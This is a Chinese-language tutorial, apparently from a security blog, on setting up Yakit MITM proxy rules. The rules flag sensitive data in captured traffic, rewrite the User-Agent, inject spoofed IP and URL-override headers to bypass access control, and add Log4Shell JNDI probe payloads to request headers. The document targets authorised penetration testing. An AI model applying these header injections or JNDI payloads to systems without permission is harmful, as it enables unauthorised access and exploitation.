Yakit自定义
匹配数据包,替换UA,维护字典
Yakit常用功能
yakit的基本使用
一图流总结Yakit的常用功能
Yakit抓包规则
在Yakit中可以在MITM中通过配置规则来优化抓包体验
通过配置规则去匹配数据包中的内容(如:upload、身份证、手机号)并给数据包标记颜色,帮助我们快速定位到可能存在安全隐患的数据包,提高效率。
效果展示
完成抓包后可以通过Tags和颜色标记寻找数据包
寻找到数据包后,可以在数据包右侧快速查看字段值(下图的右下角)
还可以设置ua头,在代理过程中你的ua头后续追加src white hat等字样,标识身份
如何配置
在MITM中选择规则内容进行配置
其中追加Tag会在history列表展示,规则名称则是在点击数据包后的右方展示,按照从上到下的顺序匹配,染色展示最后一个标记的颜色
配置完后,一定要点击保存
也可以通过json导入,如官方的规则(在导入规则处点击使用默认配置即可获取)
附上自己的两个规则json
第一个是匹配关键字染色,第二个是自动替换UA头
匹配关键字染色
匹配关键字染色的json规则(查看)
[
{
"Rule": "(?i)path.{10}",
"NoReplace": true,
"Color": "blue",
"EnableForResponse": true,
"EnableForBody": true,
"Index": 1,
"ExtraTag": [
"关键字"
],
"VerboseName": "关键字path"
},
{
"Rule": "(?i)select.{10}",
"NoReplace": true,
"Color": "blue",
"EnableForResponse": true,
"EnableForBody": true,
"Index": 2,
"ExtraTag": [
"关键字"
],
"VerboseName": "关键字select"
},
{
"Rule": "(.{7}(?i)key.{10})",
"NoReplace": true,
"Color": "blue",
"EnableForResponse": true,
"EnableForBody": true,
"Index": 3,
"ExtraTag": [
"关键字"
],
"VerboseName": "关键字key"
},
{
"Rule": "(?i)config.{10}",
"NoReplace": true,
"Color": "blue",
"EnableForResponse": true,
"EnableForBody": true,
"Index": 4,
"ExtraTag": [
"关键字"
],
"VerboseName": "关键字config"
},
{
"Rule": "(?i)phone",
"NoReplace": true,
"Color": "blue",
"EnableForResponse": true,
"EnableForBody": true,
"Index": 5,
"ExtraTag": [
"关键字"
],
"VerboseName": "关键字phone"
},
{
"Rule": "[a-zA-Z0-9.-]+\\.baidu.com",
"NoReplace": true,
"Color": "blue",
"EnableForResponse": true,
"EnableForBody": true,
"Index": 6,
"ExtraTag": [
"子域名"
],
"Disabled": true,
"VerboseName": "子域名(要自己修改)"
},
{
"Rule": "(?i)api.{7}",
"NoReplace": true,
"Color": "blue",
"EnableForResponse": true,
"EnableForHeader": true,
"EnableForBody": true,
"EnableForURI": true,
"Index": 7,
"ExtraTag": [
"api"
],
"VerboseName": "api"
},
{
"Rule": "((127\\.0\\.0\\.1)|(localhost)|(10\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})|(172\\.((1[6-9])|(2\\d)|(3[01]))\\.\\d{1,3}\\.\\d{1,3})|(192\\.168\\.\\d{1,3}\\.\\d{1,3}))",
"NoReplace": true,
"Color": "blue",
"EnableForResponse": true,
"EnableForHeader": true,
"EnableForBody": true,
"EnableForURI": true,
"Index": 8,
"ExtraTag": [
"IP"
],
"VerboseName": "内网ip"
},
{
"Rule": "(((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))",
"NoReplace": true,
"Color": "blue",
"EnableForResponse": true,
"EnableForHeader": true,
"EnableForBody": true,
"EnableForURI": true,
"Index": 9,
"ExtraTag": [
"IP"
],
"VerboseName": "IP"
},
{
"Rule": "(?i)(https|http)://[-A-Za-z0-9+\u0026@#/%?=~_|!:,.;]+[-A-Za-z0-9+\u0026@#/%=~_|]",
"NoReplace": true,
"Color": "blue",
"EnableForResponse": true,
"EnableForHeader": true,
"EnableForBody": true,
"Index": 10,
"ExtraTag": [
"URL"
],
"VerboseName": "url"
},
{
"Rule": "(ftp|file)://[-A-Za-z0-9+\u0026@#/%?=~_|!:,.;]+[-A-Za-z0-9+\u0026@#/%=~_|]",
"NoReplace": true,
"Color": "blue",
"EnableForResponse": true,
"EnableForBody": true,
"Index": 11,
"ExtraTag": [
"file"
],
"VerboseName": "file"
},
{
"Rule": "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\.[a-zA-Z]{2,}",
"NoReplace": true,
"Color": "blue",
"EnableForResponse": true,
"EnableForBody": true,
"Index": 12,
"ExtraTag": [
"邮箱"
],
"VerboseName": "邮箱"
},
{
"Rule": "(?i)upload.{7}",
"NoReplace": true,
"Color": "blue",
"EnableForResponse": true,
"EnableForBody": true,
"Index": 13,
"ExtraTag": [
"上传下载"
],
"VerboseName": "上传下载"
},
{
"Rule": "(?i)download.{7}",
"NoReplace": true,
"Color": "blue",
"EnableForResponse": true,
"EnableForBody": true,
"Index": 14,
"ExtraTag": [
"上传下载"
],
"VerboseName": "上传下载"
},
{
"Rule": "\\D1[3456789]\\d{9}\\D",
"NoReplace": true,
"Color": "purple",
"EnableForResponse": true,
"EnableForBody": true,
"Index": 15,
"ExtraTag": [
"手机号"
],
"VerboseName": "手机号"
},
{
"Rule": "([1-9]\\d{5}(18|19|20)\\d{2}((0[1-9])|(10|11|12))(([0-2][1-9])|10|20|30|31)\\d{3}[0-9Xx][^\\d])",
"NoReplace": true,
"Color": "purple",
"EnableForResponse": true,
"EnableForBody": true,
"Index": 16,
"ExtraTag": [
"身份证"
],
"VerboseName": "身份证"
},
{
"Rule": "(((?i)nginx|(?i)tomcat|(?i)weblogic|(?i)apache|(?i)jboos|(?i)websphere|(?i)iis)[0-9.]+)",
"NoReplace": true,
"Color": "orange",
"EnableForResponse": true,
"EnableForHeader": true,
"EnableForBody": true,
"Index": 17,
"ExtraTag": [
"中间件"
],
"VerboseName": "中间件版本"
},
{
"Rule": "((Access-Control-Allow-Method)s.*((DELETE)|(SEARCH)|(COPY)|(MOVE)|(PROPFIND)|(PROPPATCH)|(MKCOL)|(LOCK)|(UNLOCK)|(PUT)|(OPTIONS)|(TRACE)|(TRACK)|(HEAD)))",
"NoReplace": true,
"Color": "orange",
"EnableForResponse": true,
"EnableForHeader": true,
"Index": 18,
"ExtraTag": [
"低危"
],
"VerboseName": "低危"
},
{
"Rule": "((.{3}(?i)AccessKey.{10})|(.{3}(?i)Access Key.{10}))",
"NoReplace": true,
"Color": "yellow",
"EnableForRequest": true,
"EnableForResponse": true,
"EnableForHeader": true,
"EnableForBody": true,
"EnableForURI": true,
"Index": 19,
"ExtraTag": [
"Access Key"
],
"VerboseName": "Access Key"
},
{
"Rule": "(?i)(file=|filename=|path=|download=|upload=|fileid=|file_id=|url=|uri=|redirect=|forword=)",
"NoReplace": true,
"Color": "green",
"EnableForRequest": true,
"EnableForResponse": true,
"EnableForURI": true,
"Index": 20,
"ExtraTag": [
"路径参数"
],
"VerboseName": "路径类敏感参数"
},
{
"Rule": "(?i)(select|order by|insert|where|update)",
"NoReplace": true,
"Color": "green",
"EnableForRequest": true,
"EnableForResponse": true,
"EnableForURI": true,
"Index": 21,
"ExtraTag": [
"sql参数"
],
"VerboseName": "sql参数(GET)"
},
{
"Rule": "power by",
"NoReplace": true,
"Color": "green",
"EnableForResponse": true,
"EnableForBody": true,
"Index": 22,
"ExtraTag": [
"power by信息"
],
"VerboseName": "powerby信息"
},
{
"Rule": "((.{3}(?i)secretKey.{10})|(.{3}(?i)Secret Key.{10}))",
"NoReplace": true,
"Color": "red",
"EnableForRequest": true,
"EnableForResponse": true,
"EnableForHeader": true,
"EnableForBody": true,
"EnableForURI": true,
"Index": 23,
"ExtraTag": [
"Secret Key"
],
"VerboseName": "Secret Key"
}
]
自动替换UA
自动替换UA的json规则(查看)
记得替换为你浏览器的UA+标识(为了兼容性)
[
{
"Rule": "HTTP",
"EnableForRequest": true,
"EnableForHeader": true,
"Index": 1,
"VerboseName": "替换UA(自行修改UA)",
"ExtraHeaders": [
{
"Header": "User-Agent",
"Value": "【你要换的UA,比如说firefox100.0 white hat】"
}
]
}
]
自动添加权限绕过的Header
自动添加权限绕过的Header规则(查看)
[
{
"Rule": "HTTP",
"EnableForRequest": true,
"EnableForHeader": true,
"Index": 1,
"VerboseName": "权限绕过",
"ExtraHeaders": [
{
"Header": "Client-IP",
"Value": "127.0.0.1"
},
{
"Header": "Forwarded-For-Ip",
"Value": "127.0.0.1"
},
{
"Header": "Forwarded-For",
"Value": "127.0.0.1"
},
{
"Header": "Forwarded",
"Value": "127.0.0.1"
},
{
"Header": "True-Client-IP",
"Value": "127.0.0.1"
},
{
"Header": "X-Client-IP",
"Value": "127.0.0.1"
},
{
"Header": "X-Custom-IP-Authorization",
"Value": "127.0.0.1"
},
{
"Header": "X-Forward-For",
"Value": "127.0.0.1"
},
{
"Header": "X-Forward",
"Value": "127.0.0.1"
},
{
"Header": "X-Forwarded-By",
"Value": "127.0.0.1"
},
{
"Header": "X-Forwarded-For-Original",
"Value": "127.0.0.1"
},
{
"Header": "X-Forwarded-For",
"Value": "127.0.0.1"
},
{
"Header": "X-Forwarded-Server",
"Value": "127.0.0.1"
},
{
"Header": "X-Forwarded",
"Value": "127.0.0.1"
},
{
"Header": "X-Forwared-Host",
"Value": "127.0.0.1"
},
{
"Header": "X-Host",
"Value": "127.0.0.1"
},
{
"Header": "X-HTTP-Host-Override",
"Value": "127.0.0.1"
},
{
"Header": "X-Originating-IP",
"Value": "127.0.0.1"
},
{
"Header": "X-Real-IP",
"Value": "127.0.0.1"
},
{
"Header": "X-Remote-Addr",
"Value": "127.0.0.1"
},
{
"Header": "X-Remote-IP",
"Value": "127.0.0.1"
},
{
"Header": "X-Original-URL",
"Value": "/admin"
},
{
"Header": "X-Override-URL",
"Value": "/admin"
},
{
"Header": "X-Rewrite-URL",
"Value": "/admin"
},
{
"Header": "Referer",
"Value": "/admin"
}
]
}
]
一些其它玩法
log4j与子域名搜集的json规则(查看)
-
header位置的log4j
-
子域名搜集
两者均需要配置,自行修改导入
[
{
"Rule": "[a-zA-Z0-9.-]+\\.【目标域名】",
"NoReplace": true,
"Color": "blue",
"EnableForResponse": true,
"EnableForBody": true,
"Index": 1,
"ExtraTag": [
"子域名"
],
"VerboseName": "子域名(要自己修改)"
},
{
"Rule": "HTTP",
"EnableForRequest": true,
"EnableForHeader": true,
"Index": 2,
"VerboseName": "log4j头部检测(自行修改dnslog)",
"ExtraHeaders": [
{
"Header": "User-Agent",
"Value": "${jndi:dns://【你的dnslog】}"
},
{
"Header": "X-Forwarded-For",
"Value": "${jndi:dns://【你的dnslog】}"
},
{
"Header": "From",
"Value": "${jndi:dns://【你的dnslog】}"
},
{
"Header": "Origin",
"Value": "${jndi:dns://【你的dnslog】}"
}
],
"ExtraRepeat": true
}
]
维护自己的字典
设置过程
点击右上角的Payload
插入自己的字典
之后去webfuzz中将payload设置为常用标签,这样以后抓包可以直接使用字典进行爆破
效果展示
相信国家相信党,黑客没有好下场
请遵守相关法律法规,文中技术仅用于有授权的安全测试,禁止用于非法活动!
本文章仅面向拥有合法授权的渗透测试安全人员及进行常规操作的网络运维人员。
在操作的过程中,您应确保自己的所有行为符合当地法律法规,且不得进行违反中国人民共和国相关法律的活动。
作者不承担用户擅自使用相关技术从事任何违法活动所产生的任何责任。
浙公网安备 33010602011771号